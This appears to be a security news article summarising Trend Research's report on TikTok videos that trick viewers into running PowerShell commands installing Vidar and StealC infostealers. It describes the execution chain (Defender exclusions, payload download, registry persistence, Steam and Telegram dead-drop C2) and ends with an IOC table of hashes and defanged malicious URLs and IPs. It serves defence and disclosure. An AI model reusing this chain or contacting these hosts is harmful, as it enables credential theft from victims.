A sophisticated social engineering campaign uncovered by Trend Research is leveraging the viral reach of TikTok to distribute the Vidar and StealC information-stealing malware families.
By embedding step-by-step PowerShell execution instructions within trending, possibly AI-generated TikTok videos, attackers have managed to orchestrate a highly scalable and evasive attack targeting both individuals and organizations.
Technical Analysis of the Attack Vector
Unlike traditional phishing or fake CAPTCHA lures, this campaign eschews malicious HTML or JavaScript in favor of content-native, video-based social engineering.
Threat actors create faceless TikTok accounts many now deactivated, such as @gitallowed and @zane.houghton that push videos purporting to offer software activation tricks for Windows, Office, CapCut, and Spotify.
The instructional content, often voiced using synthesized AI tools, directs viewers through a simple sequence: press Windows+R, launch PowerShell, and execute a provided command that covertly downloads and launches a malicious payload via a remote script.
One viral video from this set amassed nearly 500,000 views, highlighting the tremendous exposure potential of algorithm-driven social media platforms.
According to Trend Micro Report, these videos are designed for mass appeal, with minimal on-screen complexity and a presentation style closely mimicking legitimate technical tutorials.
The attackers’ use of PowerShell as a social engineering mechanism, rather than simply a post-exploitation tool, marks a notable shift in the threat landscape, presenting challenges for security solutions that typically scan for malicious code or suspect URLs rather than human-driven system abuses.
Malicious Execution Chain
When a victim follows the attacker’s instructions, the PowerShell script proceeds to:
- Create concealed directories in APPDATA and LOCALAPPDATA.
- Add these directories to the Windows Defender exclusion list for stealth.
- Download a secondary payload (Vidar or StealC) from a hardcoded URL and execute it as a hidden, elevated process.
- Retrieve an additional PowerShell script, establish persistence via registry modification, and erase temporary folders to thwart forensic investigation.
In particular, the malware abuses trusted third-party services including Steam and Telegram for command-and-control (C&C) communication.
Vidar, for example, leverages “Dead Drop Resolvers” by hiding active C&C IPs in Steam profile fields, allowing dynamic updates without direct infrastructure exposure.
The campaign reflects a new paradigm in malware delivery: social media platforms now serve as the primary infection vector rather than ancillary distribution channels.
Attackers exploit the high-trust, low-friction environment of viral content to deploy complex malware at scale. For defenders, this renders many legacy detection technologies less effective.
A robust response requires augmenting technical controls with behavioral analysis, monitoring for atypical PowerShell or system utility use, and actively tracking emerging threats on social media.
Organizations should bolster user education, focusing on skepticism towards unsolicited “how-to” content especially involving administrative commands or downloads.
Organizations are urged to proactively hunt for these IOCs in their environments and reinforce user training to minimize the risk of compromise from continuously evolving, socially engineered malware campaigns.
Indicators of Compromise (IOC)
| Type | Value | Description |
|---|---|---|
| File Hash | 3bb81c977bb34fadb3bdeac7e61193dd009725783fb2cf453e15ced70fc39e9b | StealC Payload |
| File Hash | afc72f0d8f24657d0090566ebda910a3be89d4bdd68b029a99a19d146d63adc5 | Vidar Payload |
| File Hash | b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886 | Initial PowerShell Script |
| URL | hxxps://allaivo[.]me/spotify | Initial Download Source |
| URL | hxxps://amssh[.]co/file[.]exe | Secondary Payload Source |
| URL | hxxps://amssh[.]co/script[.]ps1 | Persistence Script Download |
| URL | hxxp://91[.]92[.]46[.]70/1032c730725d1721[.]php | StealC C2 Endpoint |
| URL | hxxps://steamcommunity[.]com/profiles/76561199846773220 | Vidar DDR/C2 |
| URL | hxxps://t[.]me/v00rd | Vidar DDR/C2 via Telegram |
| IP Address | 49[.]12[.]113[.]201 | Supporting Infrastructure |
| IP Address | 116[.]202[.]6[.]216 | Supporting Infrastructure |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
